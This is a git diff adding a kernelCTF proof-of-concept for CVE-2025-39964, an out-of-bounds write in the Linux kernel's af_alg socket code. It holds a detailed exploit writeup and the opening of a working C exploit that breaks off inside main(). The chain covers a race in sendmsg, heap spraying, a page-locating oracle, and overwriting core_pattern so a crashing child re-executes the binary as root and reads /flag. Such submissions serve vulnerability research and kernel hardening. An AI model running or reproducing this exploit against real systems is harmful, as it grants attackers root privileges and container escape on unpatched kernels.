diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/docs/exploit.md new file mode 100644 index 000000000..b55172a50 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/docs/exploit.md @@ -0,0 +1,336 @@ +# STAR-2025-0046: Linux Kernel af_alg out-of-bounds access + +## Summary +| **Product** | Linux Kernel | +| ----------------------- | ------------------------ | +| **Vendor** | Linux | +| **Severity** | High - Adversaries may exploit software vulnerabilities to elevate its privileges to root. | +| **Affected Versions** | [Linux 2.6.38](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=8ff590903d5fc7f5a0a988c38267a3d08e6393a2) - upstream | +| **CVE Identifier** | | +| **CVE Description** | A out-of-bounds vulnerability in the Linux Kernel af_alg can be exploited to achieve local privilege escalation | +| **CWE Classification(s)** | CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer | + +## CVSS3.1 Scoring System +**Base Score:** 7.8 (High) +**Vector String:** `CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` +| **Metric** | **Value** | +| ---------------------------- | --------- | +| **Attack Vector (AV)** | Local | +| **Attack Complexity (AC)** | Low | +| **Privileges Required (PR)** | Low | +| **User Interaction (UI)** | None | +| **Scope (S)** | Unchanged | +| **Confidentiality \(C)** | High | +| **Integrity (I)** | High | +| **Availability (A)** | High | + + +## Description of the vulnerability + +In `af_alg_sendmsg` function, we can craft context state (`af_alg_ctx`) that have `ctx->merge = 1` and also have last sgl entry that have `sgl->cur = 0`. 
From that condition we can trigger out-of-bounds in `af_alg_sendmsg` via this code: +```c + /* use the existing memory in an allocated page */ + if (ctx->merge && !(msg->msg_flags & MSG_SPLICE_PAGES)) { + sgl = list_entry(ctx->tsgl_list.prev, + struct af_alg_tsgl, list); + sg = sgl->sg + sgl->cur - 1; // [1] + len = min_t(size_t, len, + PAGE_SIZE - sg->offset - sg->length); + + err = memcpy_from_msg(page_address(sg_page(sg)) + + sg->offset + sg->length, + msg, len); +``` + +If sgl->cur = 0 in this state, the index computed at [1] is `sgl->cur - 1 = -1`, so `sg` points into the previous heap chunk. With this condition we can plant a crafted page address in the previous chunk and achieve an arbitrary kernel write via `memcpy_from_msg`. + +This is how we make that condition happen: + +Let's say we have a situation where: +1. last sgl->cur = MAX_SGL_ENTS-1 +2. ctx->merge = 0 + +In this code: +```C + + if (!af_alg_writable(sk)) { + err = af_alg_wait_for_wmem(sk, msg->msg_flags); // [2] + if (err) + goto unlock; + } + + /* allocate a new page */ + len = min_t(unsigned long, len, af_alg_sndbuf(sk)); + + err = af_alg_alloc_tsgl(sk); // [3] + if (err) + goto unlock; + + sgl = list_entry(ctx->tsgl_list.prev, struct af_alg_tsgl, + list); + sg = sgl->sg; + if (sgl->cur) + sg_unmark_end(sg + sgl->cur - 1); +``` + +Let's say two threads call sendmsg and both get stuck at [2], waiting for send buffer space to become available. + +We release some buffer space and one of the threads wakes up. This thread will use the sg available in the last sgl because we have `sgl->cur = MAX_SGL_ENTS-1`. Then this thread will enter this code: +```c + do { + struct page *pg; + unsigned int i = sgl->cur; + + plen = min_t(size_t, len, PAGE_SIZE); + + pg = alloc_page(GFP_KERNEL); + pr_info("[DEBUG] plen %zd, ctx->merge: %d\n", plen, ctx->merge); + sg_assign_page(sg + i, pg); + + err = memcpy_from_msg( + page_address(sg_page(sg + i)), + msg, plen); + ...
+ sgl->cur++; + } while (len && sgl->cur < MAX_SGL_ENTS); + + ctx->merge = plen & (PAGE_SIZE - 1); //[4] +``` +Let say we send `len` below the PAGE_SIZE, so `ctx->merge` will set to 1, then this thread will finish. + +In this state, we still have one more thread that stuck at `af_alg_wait_for_wmem` [2]. We will release some buffer, and make this thread continue. + +Now sgl->cur is MAX_SGL_ENTS, it will alloc another sgl at `af_alg_alloc_tsgl` [3], so we have last sgl that have `sgl->cur = 0`. In this state, we passed invalid user space addr. So code will fail in this line: +```c + err = memcpy_from_msg( + page_address(sg_page(sg + i)), + msg, plen); + if (err) { + __free_page(sg_page(sg + i)); + sg_assign_page(sg + i, NULL); + goto unlock; // [5] + } +``` +This thread will finish, and the state of af_alg_ctx is having `ctx->merge = 1` and the last sgl with `sgl->cur = 0`. Next sendmsg will trigger out of bounds like we mention earlier. + +## Proof-Of-Concept Crash log + +``` +[ 13.816985] ================================================================== +[ 13.822876] BUG: KASAN: slab-out-of-bounds in af_alg_sendmsg+0x1f38/0x2150 +[ 13.826941] Read of size 8 at addr ffff888012f1fff8 by task exploit/146 +[ 13.828699] +[ 13.829129] CPU: 1 UID: 1000 PID: 146 Comm: exploit Not tainted 6.12.43 #3 +[ 13.829156] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.4 +[ 13.829184] Call Trace: +[ 13.829198] +[ 13.829201] dump_stack_lvl+0x64/0x80 +[ 13.829211] print_report+0xc4/0x640 +[ 13.829218] ? __pfx__raw_spin_lock_irqsave+0x10/0x10 +[ 13.829222] ? af_alg_sendmsg+0x1f38/0x2150 +[ 13.829227] kasan_report+0xc6/0x100 +[ 13.829230] ? af_alg_sendmsg+0x1f38/0x2150 +[ 13.829232] af_alg_sendmsg+0x1f38/0x2150 +[ 13.829236] ? tty_update_time+0x2ea/0x440 +[ 13.829239] ? tty_read+0x340/0x540 +[ 13.829241] ? __pfx_af_alg_sendmsg+0x10/0x10 +[ 13.829243] ? __pfx_aa_sk_perm+0x10/0x10 +[ 13.829247] ? 
fdget+0x58/0x3e0 +[ 13.829271] __sys_sendto+0x3d8/0x460 +[ 13.829276] ? __pfx___sys_sendto+0x10/0x10 +[ 13.829278] ? vfs_read+0x6c3/0xb70 +[ 13.829282] ? __asan_memset+0x23/0x50 +[ 13.829285] ? ksys_read+0xfe/0x1d0 +[ 13.829287] ? __pfx_ksys_read+0x10/0x10 +[ 13.829290] ? up_read+0x18/0xa0 +[ 13.829293] __x64_sys_sendto+0xe0/0x1c0 +[ 13.829295] ? clear_bhb_loop+0x40/0x90 +[ 13.829299] ? clear_bhb_loop+0x40/0x90 +[ 13.829301] ? clear_bhb_loop+0x40/0x90 +[ 13.829304] do_syscall_64+0x58/0x120 +[ 13.829307] entry_SYSCALL_64_after_hwframe+0x76/0x7e +[ 13.829310] RIP: 0033:0x423eed +[ 13.829314] Code: 02 48 c7 c0 ff ff ff ff eb b5 0f 1f 00 f3 0f 1e fa 80 3d 7d 11 09 00 00 419 +[ 13.829317] RSP: 002b:00007ffcc1b6a658 EFLAGS: 00000246 ORIG_RAX: 000000000000002c +[ 13.829374] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 0000000000423eed +[ 13.829376] RDX: 0000000000000800 RSI: 00000000004b5b40 RDI: 0000000000000004 +[ 13.829377] RBP: 00007ffcc1b6a7c0 R08: 0000000000000000 R09: 0000000000000000 +[ 13.829378] R10: 0000000000008000 R11: 0000000000000246 R12: 00007ffcc1b6a8d8 +[ 13.829380] R13: 00007ffcc1b6a8e8 R14: 00000000004af828 R15: 0000000000000001 +[ 13.829382] +[ 13.829383] +[ 13.878763] Allocated by task 144: +[ 13.879617] kasan_save_stack+0x33/0x60 +[ 13.880750] kasan_save_track+0x14/0x30 +[ 13.881689] __kasan_slab_alloc+0x6e/0x70 +[ 13.882691] kmem_cache_alloc_noprof+0x10e/0x2b0 +[ 13.883731] getname_kernel+0x51/0x330 +[ 13.884791] kern_path+0x17/0x50 +[ 13.885467] unix_find_other+0x102/0x6a0 +[ 13.886774] unix_dgram_connect+0x21f/0xc50 +[ 13.887809] __sys_connect+0x103/0x130 +[ 13.888868] __x64_sys_connect+0x72/0xb0 +[ 13.890409] do_syscall_64+0x58/0x120 +[ 13.891238] entry_SYSCALL_64_after_hwframe+0x76/0x7e +[ 13.892454] +[ 13.892787] Freed by task 144: +[ 13.893632] kasan_save_stack+0x33/0x60 +[ 13.894562] kasan_save_track+0x14/0x30 +[ 13.895426] kasan_save_free_info+0x3b/0x60 +[ 13.896244] __kasan_slab_free+0x37/0x50 +[ 13.896964] kmem_cache_free+0x183/0x4b0 
+[ 13.897873] kern_path+0x39/0x50 +[ 13.898850] unix_find_other+0x102/0x6a0 +[ 13.899886] unix_dgram_connect+0x21f/0xc50 +[ 13.901424] __sys_connect+0x103/0x130 +[ 13.902278] __x64_sys_connect+0x72/0xb0 +[ 13.903163] do_syscall_64+0x58/0x120 +[ 13.903869] entry_SYSCALL_64_after_hwframe+0x76/0x7e +[ 13.905231] +[ 13.905709] The buggy address belongs to the object at ffff888012f1e600 +[ 13.905709] which belongs to the cache names_cache of size 4096 +[ 13.908496] The buggy address is located 2552 bytes to the right of +[ 13.908496] allocated 4096-byte region [ffff888012f1e600, ffff888012f1f600) +[ 13.911995] +[ 13.912381] The buggy address belongs to the physical page: +[ 13.913783] page: refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x12f18 +[ 13.915745] head: order:3 mapcount:0 entire_mapcount:0 nr_pages_mapped:0 pincount:0 +[ 13.917829] flags: 0x100000000000040(head|node=0|zone=1) +[ 13.919473] page_type: f5(slab) +[ 13.920369] raw: 0100000000000040 ffff88800a3a03c0 dead000000000122 0000000000000000 +[ 13.921984] raw: 0000000000000000 0000000000070007 00000001f5000000 0000000000000000 +[ 13.923504] head: 0100000000000040 ffff88800a3a03c0 dead000000000122 0000000000000000 +[ 13.925136] head: 0000000000000000 0000000000070007 00000001f5000000 0000000000000000 +[ 13.927011] head: 0100000000000003 ffffea00004bc601 ffffffffffffffff 0000000000000000 +[ 13.928761] head: 0000000000000008 0000000000000000 00000000ffffffff 0000000000000000 +[ 13.930494] page dumped because: kasan: bad access detected +[ 13.931957] +[ 13.932564] Memory state around the buggy address: +[ 13.934043] ffff888012f1fe80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc +[ 13.935662] ffff888012f1ff00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc +[ 13.937680] >ffff888012f1ff80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc +[ 13.939445] ^ +[ 13.941597] ffff888012f20000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +[ 13.943583] ffff888012f20080: 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 +[ 13.945124] ================================================================== +[ 13.947164] Disabling lock debugging due to kernel taint +send4 -1 +``` + +## Exploit Idea + +Since the vulnerability can trigger an integer underflow and cause to reference data from a previous memory chunk, we attempted to spray multiple same-sized chunks using sendmsg(). +This allowed us to control the `page_link` value and achieve arbitrary memory write. By overwriting the `core_pattern`, we successfully escalated privileges and achieved container escape. + +```C +struct scatterlist { + long unsigned int page_link; /* 0 8 */ + unsigned int offset; /* 8 4 */ + unsigned int length; /* 12 4 */ + dma_addr_t dma_address; /* 16 8 */ + unsigned int dma_length; /* 24 4 */ + unsigned int dma_flags; /* 28 4 */ + + /* size: 32, cachelines: 1, members: 6 */ + /* last cacheline: 32 bytes */ +}; + +struct af_alg_tsgl { + struct list_head list; /* 0 16 */ + unsigned int cur; /* 16 4 */ + + /* XXX 4 bytes hole, try to pack */ + + struct scatterlist sg[]; /* 24 0 */ + + /* size: 24, cachelines: 1, members: 3 */ + /* sum members: 20, holes: 1, sum holes: 4 */ + /* last cacheline: 24 bytes */ +}; +``` + +### Controlling the write destination via sg[-1].page_link + +When `sgl->cur = 0`, `sg = sgl->sg + sgl->cur - 1 = sgl->sg[-1]`. +`sgl->sg[0]` is at offset 24 from the start of `af_alg_tsgl` (after the 16-byte `list_head` and 4-byte `cur` + 4-byte padding). +`sg[-1]` is therefore at offset `24 - sizeof(scatterlist) = 24 - 32 = -8` relative to the start of the `af_alg_tsgl` object. + +Each `af_alg_tsgl` is `kmalloc`'d into a 4096-byte slab object. So `sg[-1]` falls 8 bytes before the current `af_alg_tsgl`, which is the **last 8 bytes of the previous 4096-byte heap object** at offset `4096 - 8 = 0xff8`. + +We use `sendmsg()` spray to fill the previous heap slot with a controlled `msg_control` buffer (`payload[]`). 
+`payload[0xff8]` therefore directly aliases `sg[-1].page_link` — the only field we need to control. +`sg[-1].offset` and `sg[-1].length` sit at bytes 8–15 of `sg[-1]`, i.e. past the end of the previous object: they overlap the first 8 bytes of the new `af_alg_tsgl` itself (its `list.next` pointer), not `payload[]`, which is only 0x1000 bytes long. We therefore do not set them directly; their values are accounted for in the final offset calculation. + +### The write-destination oracle + +The vulnerable code is: + +```C +err = memcpy_from_msg(page_address(sg_page(sg)) + sg->offset + sg->length, + msg, len); +``` + +`sg_page(sg)` interprets `sg->page_link` as a pointer to a `struct page` in the kernel's vmemmap region. +`page_address(page)` converts that back to a virtual address: + +``` +dest = page_offset_base + (page_link - vmemmap_base) / sizeof(struct page) * PAGE_SIZE + + sg->offset + sg->length +``` + +With `page_link` near 0, the integer arithmetic wraps around (all 64-bit unsigned): + +``` +pfn = (0 - vmemmap_base) / 64 → very large pfn +dest = page_offset_base + pfn * PAGE_SIZE → wraps back into userspace +``` + +This means the computed `dest` lands inside our pre-mapped userspace region `[0x100000000, 0x500000000000)`. + +`memcpy_from_msg` internally calls `copy_from_user_iter` with `to = dest`: + +```C +static __always_inline +size_t copy_from_user_iter(void __user *iter_from, size_t progress, + size_t len, void *to, void *priv2) +``` + +`__copy_from_user` has two behaviours depending on `to`: +- If `to` is an **unmapped address**, the copy faults and returns an error — `send()` returns `-1`. +- If `to` is a **mapped userspace address**, the copy silently succeeds — `send()` returns `1`. + +This gives us a clean boolean oracle: **`send()` returns 1 if and only if the current `page_link` maps `dest` to a physically-backed page in our mmap region.** + +### Binary search to locate the exact physical page + +We pre-map the entire range `[0x100000000, 0x500000000000)` (≈ 80 TB) with anonymous pages in 2 GB chunks.
When `page_link = 0` the initial `dest` lands somewhere inside this region — the oracle returns 1. + +We then narrow down the exact page with an 8-step binary search: + +``` +total range = 0x500000000000 bytes +half[j] = total >> (1 + j) (halves the address range each step) +delta[j] = total >> (7 + j) (= half[j] / 64, the page_link adjustment) +``` + +At each step `j`, we test `guess_addr(oracle - delta[j])`: +- Decreasing `page_link` by `delta[j]` shifts `dest` **down** by `delta[j] * 64 = half[j]` bytes. +- If `send()` returns **1** — the shifted dest is still mapped → `dest` is in the **upper half** of the current range → unmap the lower half, advance `start` to the upper half boundary. +- If `send()` returns **-1** — the shifted dest fell outside the mapped region → `dest` is in the **lower half** → unmap the upper half, keep `start` unchanged. + +After 8 iterations the remaining mapped window is `0x500000000000 >> 8 = 0x5000000000` bytes (320 GB), i.e. 0x50 windows of 4 GB each. +A `mincore()` scan over this window finds the exact 4 KB page (identified by the `'a'`-filled content our spray wrote into it). + +### Redirecting the write to core_pattern + +Once we have the exact userspace virtual address `leak_offset` of the OOB-written page, we know both the physical page and the current within-page byte offset of the write. The steps to redirect to `core_pattern` are: + +1. **Align within-page offset**: send `adjust_offset = 0x1000 + (core_pattern & 0xfff) - (leak_offset & 0xfff)` dummy bytes so that the next write starts at the same in-page offset as `core_pattern`. + +2. **Adjust page_link to target core_pattern's page**: update `payload[0xff8]` (sg[-1].page_link) by + `Δ = ((core_pattern & ~0xfff) - (leak_offset & ~0xfff)) >> 6` + The `>> 6` (or `/ 64`) is a simplification of the formula `(addr / 0x1000) * 64`. We divide the address by `0x1000` to find the page index, and then multiply by `64` because each memory page has a `struct page` that is exactly 64 bytes long. + +3.
**Write the payload**: `send(opfd, "|/proc/%P/fd/666 %P", 64, MSG_MORE)` — the kernel copies this string to `core_pattern[]`. + +Once `core_pattern` is overwritten, a forked child process (running since exploit start) detects the change via `/proc/sys/kernel/core_pattern`, then deliberately faults (`*(size_t*)0 = 0`) to trigger a coredump. The kernel invokes `core_pattern` as root, re-executing our binary (through the crashing child's fd 666) with the crashing child's PID (`%P`) as `argv[1]`. The re-exec uses `pidfd_getfd()` to steal that process's stdio file descriptors and reads `/flag`. \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/docs/vulnerability.md new file mode 100644 index 000000000..c991c0035 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/docs/vulnerability.md @@ -0,0 +1,12 @@ +- Requirements: + - Capabilities: + - Kernel configuration: CONFIG_CRYPTO_USER_API + - User namespaces required: No +- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8ff590903d5fc7f5a0a988c38267a3d08e6393a2 +- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=1b34cbbf4f011a121ef7b2d7d6e6920a036d5285 +- Affected kernel versions: v2.6.38 - v6.16 +- Affected component: crypto/af_alg +- Cause: Out-of-bounds access +- Syscall to disable: +- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-39964 +- Description: An out-of-bounds access in the Linux kernel's crypto/af_alg. In the Linux kernel, the following vulnerability has been resolved: crypto: af_alg - Disallow concurrent writes in af_alg_sendmsg Issuing two writes to the same af_alg socket is bogus as the data will be interleaved in an unpredictable fashion. Furthermore, concurrent writes may create inconsistencies in the internal socket state. Disallow this by adding a new ctx->write field that indicates exclusive ownership for writing.
diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/Makefile b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/Makefile new file mode 100644 index 000000000..3eabaca61 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/Makefile @@ -0,0 +1,5 @@ +all: exploit + +exploit: exploit.c + gcc -static-pie -o exploit exploit.c + diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/exploit b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/exploit new file mode 100755 index 000000000..ad33ffc71 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/exploit.c b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/exploit.c new file mode 100644 index 000000000..67d4acb78 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/exploit.c @@ -0,0 +1,884 @@ +/* + * Exploit for CVE-2025-39964 — Linux af_alg out-of-bounds write (COS + * 121-18867.199.28) + * + * Vulnerability: af_alg_sendmsg() has a race condition allowing two concurrent + * sendmsg calls to produce ctx->merge=1 with sgl->cur=0 simultaneously. + * In this state the merge branch computes sg = sgl->sg + sgl->cur - 1 = sg[-1], + * which is an out-of-bounds read into the previous heap chunk. The + * sg[-1].page_link value from the previous chunk controls the destination of + * memcpy_from_msg(), giving an arbitrary kernel write primitive. + * + * Exploit chain (COS 121-18867.199.28): + * 1. Spray 0x100 AF_UNIX socket pairs; each thread sends a crafted msghdr + * whose msg_control (payload[]) lands in the heap slot just before an + * af_alg_tsgl. 
payload[PAYLOAD_OFFS_TARGET] controls sg[-1].page_link = write + * destination. + * 2. Set up an AF_ALG socket (AES-CBC); advance sgl->cur to MAX_SGL_ENTS-1 = + * 125 using 1 sendmsg + SGL_MERGE_ITERATIONS send/recv pairs + 1 more send. + * 3. Fork two children that race: one sets ctx->merge=1 + * (sgl->cur→MAX_SGL_ENTS), the other allocates a new sgl (sgl->cur→0) via an + * invalid userspace pointer. + * 4. With ctx->merge=1 and sgl->cur=0, the next sendmsg triggers the OOB write + * to the address derived from payload[PAYLOAD_OFFS_TARGET]. + * 5. Map [SCAN_START_ADDR, SCAN_END_ADDR) in MAP_CHUNK_SIZE (2 GB) chunks so + * the OOB write destination (which wraps into userspace due to page_link + * arithmetic) falls in a mapped region. An 8-step binary search (oracle = + * send() return value) narrows the target to a ~320 GB window; mincore then + * locates the exact page. + * 6. Adjust the write destination via page_link arithmetic to point to the + * core_pattern kernel symbol, then write "|/proc/%P/fd/666 %P". + * 7. A forked child watches for core_pattern to change, then faults (NULL + * deref), causing the kernel to execute our binary as root via core_pattern. + * 8. Re-exec reads /flag via pidfd_getfd() on the crashing child's stdio descriptors.
+ */ + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#ifndef SYS_pidfd_getfd +#define SYS_pidfd_getfd 438 +#endif + +#ifndef SYS_pidfd_open +#define SYS_pidfd_open 434 +#endif + +size_t vmemmap_base = 0xffffea0000000000ULL; +size_t page_offset_base = 0xffff888000000000ULL; +size_t core_pattern = 0xffffffff8420d520ULL; + +/* Socket options */ +#define ALG_SET_KEY 1 +#define ALG_SET_IV 2 +#define ALG_SET_OP 3 +#define ALG_SET_AEAD_ASSOCLEN 4 +#define ALG_SET_AEAD_AUTHSIZE 5 +#define ALG_SET_DRBG_ENTROPY 6 +#define ALG_SET_KEY_BY_KEY_SERIAL 7 + +/* Operations */ +#define ALG_OP_DECRYPT 0 +#define ALG_OP_ENCRYPT 1 + +typedef unsigned char u8; +typedef unsigned short u16; +typedef unsigned int u32; +typedef unsigned long long u64; +typedef char i8; +typedef short i16; +typedef int i32; +typedef long long i64; +#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0])) + +#define __u32 uint32_t +#define __u16 uint16_t +#define __u8 uint8_t +#define PAUSE \ + { \ + int x; \ + printf(":"); \ + read(0, &x, 1); \ + } + +#define SYSCHK(x) \ + ({ \ + typeof(x) __res = (x); \ + if (__res == (typeof(x))-1) \ + err(1, "SYSCHK(" #x ")"); \ + __res; \ + }) + +#ifndef SYS_process_vm_readv +#define SYS_process_vm_readv 310 +#endif + +/* Number of AF_UNIX pairs to spray; one pair per exploit thread */ +#define THREAD_NUM 0x100 + +/* + * Size of each private anonymous mapping used as the OOB write oracle region: + * 512 PTEs per page * PAGE_SIZE = 2 MB physical coverage per mmap entry. + */ +#define MMAP_REGION_LEN (0x1000 / 8 * 0x1000) + +/* + * Start of the contiguous userspace region we map for the binary-search oracle. + * We start just above the 4 GB boundary to avoid the low userspace region. 
+ */ +#define SCAN_START_ADDR 0x100000000ULL + +/* Maximum number of mincore windows tried during the page-address scan */ +#define MAX_SCAN_ITERATIONS 0x50 + +/* + * Unmapped address passed as invalid user pointer to trigger the race + * condition: 0xfff000 sits just below 16 MB, a low range this exploit never + * maps, so the copy from it is expected to fault. + */ +#define INVALID_USER_ADDR ((void *)0xfff000) + +/* + * Byte offset of sg[-1].page_link inside the sprayed msg_control payload: + * af_alg_tsgl is allocated in a 4096-byte slab object. + * sgl->sg[0] starts at byte 24 (sizeof(af_alg_tsgl)). + * sg[-1] = sgl->sg[-1] lies 32 bytes (sizeof(scatterlist)) before sg[0], + * i.e. at byte 24 - 32 = -8 relative to the tsgl object start. + * In the *previous* 4096-byte heap object that is offset 4096 - 8 = 0xff8. + * scatterlist.page_link is the first field (offset 0), so payload[0xff8] + * directly controls the page_link that the OOB write uses as its destination. + */ +#define PAYLOAD_OFFS_TARGET 0xff8 + +/* + * Number of send/recv iterations to advance sgl->cur from 1 to 124 + * (MAX_SGL_ENTS-2). MAX_SGL_ENTS = (4096 - sizeof(af_alg_tsgl)) / + * sizeof(scatterlist) - 1 = (4096 - 24) / 32 - 1 = 126. One initial sendmsg + * sets cur=1; SGL_MERGE_ITERATIONS send+recv pairs bring it to 1 + 0x7b = 124; + * one more send brings it to 125 = MAX_SGL_ENTS - 1. + */ +#define SGL_MERGE_ITERATIONS 0x7b + +/* Compile-time unslid base of kernel text (_stext); used when computing symbol + * offsets */ +#define KERNEL_TEXT_BASE 0xffffffff81000000UL + +/* + * KASLR-invariant offset of core_pattern from _stext in COS 121-18867.199.28. + * core_pattern is at 0xffffffff83fb48c0; _stext is at KERNEL_TEXT_BASE.
+ */ +#define CORE_PATTERN_COS_OFFSET (0xffffffff83fb48c0UL - KERNEL_TEXT_BASE) + +/* Upper bound of the userspace oracle scan region [SCAN_START_ADDR, + * SCAN_END_ADDR) */ +#define SCAN_END_ADDR 0x500000000000ULL + +/* Size of each anonymous 2 GB mmap chunk used to cover the oracle region */ +#define MAP_CHUNK_SIZE 0x80000000ULL + +#ifndef PAGE_SIZE +#define PAGE_SIZE 0x1000 +#endif +/* Page offset mask for within-page alignment (PAGE_SIZE - 1) */ +#define PAGE_MASK (PAGE_SIZE - 1) + +pthread_t tid[THREAD_NUM]; + +/* Shared scratch buffer used by spray threads and the main exploit loop */ +char buf[0x10000]; +char vec[0x100000]; + +int cfd[2]; +int sfd[THREAD_NUM][2]; +char payload[0x1000]; +int opfd; + +struct sockaddr_alg { + __u16 salg_family; + __u8 salg_type[14]; + __u32 salg_feat; + __u32 salg_mask; + __u8 salg_name[64]; +}; + +void set_cpu(int i) { + cpu_set_t mask; + CPU_ZERO(&mask); + CPU_SET(i, &mask); + sched_setaffinity(0, sizeof(mask), &mask); +} + +void *spray_send_thread(void *x) { + size_t idx = (size_t)x; + write(cfd[0], buf, 1); + read(cfd[0], buf, 1); + struct iovec iov = {buf, 0x1000}; + struct msghdr mhdr = {.msg_iov = &iov, + .msg_iovlen = 1, + .msg_control = payload, + .msg_controllen = 0x1000}; + while (1) { + sendmsg(sfd[idx][1], &mhdr, 0); + write(cfd[0], buf, 1); + read(cfd[0], buf, 1); + } +} + +/* + * Step 1: Spray THREAD_NUM AF_UNIX socket pairs, each sending a crafted msghdr + * whose msg_control buffer (payload[]) will occupy the heap slot immediately + * preceding an af_alg_tsgl allocation. payload[PAYLOAD_OFFS_TARGET] then + * aliases sg[-1].page_link and controls the OOB write destination. 
+ */ +void spray_unix_sockets() { + memset(payload, 'a', 0x1000); + struct cmsghdr *first; + first = (struct cmsghdr *)payload; + first->cmsg_len = 0x1000; + first->cmsg_level = + 0; /* must differ from SOL_SOCKET=1 to skip cmsg processing */ + first->cmsg_type = 0x41414141; /* dummy filler value */ + /* Initially zero; the binary search will update this to guide the OOB write + */ + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = 0; + + for (int i = 0; i < THREAD_NUM; i++) { + SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, sfd[i])); + int n = 0x800; + setsockopt(sfd[i][1], SOL_SOCKET, SO_SNDBUF, (char *)&n, sizeof(n)); + setsockopt(sfd[i][0], SOL_SOCKET, SO_RCVBUF, (char *)&n, sizeof(n)); + write(sfd[i][1], buf, 0x1000); + } + + for (int i = 0; i < THREAD_NUM; i++) + pthread_create(&tid[i], 0, spray_send_thread, (void *)(size_t)i); + + for (int i = 0; i < THREAD_NUM; i++) + read(cfd[1], buf, 1); +} + +/* + * Step 5a: Map the full userspace range [SCAN_START_ADDR, SCAN_END_ADDR) with + * physical pages in MAP_CHUNK_SIZE (2 GB) chunks. When sg[-1].page_link is + * crafted with a value near 0, the kernel's page_address() computation wraps + * around and the OOB write destination lands somewhere within this region. + * Mapping real pages here means the write silently succeeds (our oracle), + * letting us binary-search for the exact physical page by progressively + * munmap-ing halves of this range. + */ +void allocate_map() { + char *start = (void *)SCAN_START_ADDR; + while (1) { + start = SYSCHK(mmap(start, MAP_CHUNK_SIZE, PROT_READ | PROT_WRITE, + MAP_SHARED | MAP_ANON | MAP_FIXED, -1, 0)); + start += MAP_CHUNK_SIZE; + if ((size_t)start >= SCAN_END_ADDR) + break; + } +} + +/* + * Step 5b: Use mincore to find the exact virtual address in [start, start+4GB) + * that corresponds to the physical page the OOB write targets. 
A page marked + * resident (mincore bit = 1) that also contains our spray marker ('a') is the + * hit: it is the page that the kernel's arbitrary-write wrote into. + */ +size_t search_offset(char *start) { + char *pvec = NULL; + for (int i = 0; i < MAX_SCAN_ITERATIONS; i++) { + mincore((void *)start, 0x100000000ULL, vec); + pvec = memchr(vec, 1, 0x100000); + if (pvec) { + char *leak_offset = start + (pvec - vec) * 0x1000; + pvec = memchr((void *)leak_offset, 'a', 0x1000); + if (pvec) + break; + } + start += 0x100000000ULL; + } + if (pvec == NULL) + exit(0); + printf("\npvec %p %x\n", pvec, pvec[0]); + return (size_t)pvec; +} + +int check_core() { + /* Check if /proc/sys/kernel/core_pattern has been overwritten */ + char core_pattern_buf[0x100] = {}; + int core = open("/proc/sys/kernel/core_pattern", O_RDONLY); + read(core, core_pattern_buf, sizeof(core_pattern_buf)); + close(core); + return strncmp(core_pattern_buf, "|/proc/%P/fd/666", 0x10) == 0; +} + +void crash(char *cmd) { + int memfd = memfd_create("", 0); + /* send our binary to memfd for core_pattern payload */ + SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff)); + /* our binary now at file descriptor 666 */ + dup2(memfd, 666); + close(memfd); + while (check_core() == 0) + sleep(1); + puts("Root shell !!"); + /* Trigger program crash and cause kernel to execute program from core_pattern + * which is our "root" binary */ + *(size_t *)0 = 0; +} + +size_t bypass_kaslr(u64 base); + +int guess_addr(size_t guesss) { + for (int i = 0; i < THREAD_NUM; i++) { + read(sfd[i][0], buf, 0x1000); + read(cfd[1], buf, 1); + } + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = guesss; + write(cfd[1], buf, 0x100); + buf[0] = 'b'; + int x = send(opfd, buf, 1, MSG_MORE); + printf("x: %d\n", x); + return x == 1; +} + +int trigger_exploit(); +int main(int argc, char **argv) { + + setvbuf(stdin, 0, 2, 0); + setvbuf(stdout, 0, 2, 0); + puts("Exploit start"); + if (argc == 1) { + size_t stext = 0; + if 